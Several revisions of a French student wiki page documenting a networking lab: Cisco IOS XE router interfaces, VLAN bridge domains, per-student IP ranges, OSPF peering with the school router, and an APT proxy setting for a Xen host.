bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35327
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:37:10Z
<p>Dfourny : </p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35324
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:20:53Z
<p>Dfourny : </p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35315
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:11:14Z
<p>Dfourny : /* Plages d'IP */</p>
<hr />
<div>== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35313
TP sysres IMA2a5 2016/2017 G1
2016-11-21T14:09:15Z
<p>Dfourny : /* Plages d'IP */</p>
<hr />
<div>== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
- 10.60.2?.1<br />
- 193.48.57.190<br />
<br />
Routeur de Nabil:<br />
- 10.60.2?.2<br />
- 193.48.57.189<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35309
TP sysres IMA2a5 2016/2017 G1
2016-11-21T13:49:08Z
<p>Dfourny : Page créée avec « == Plages d'IP == == Configuration du routeur == === Version === Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux: Cisco IOS XE Software, ... »</p>
<hr />
<div>== Plages d'IP ==<br />
<br />
<br />
<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
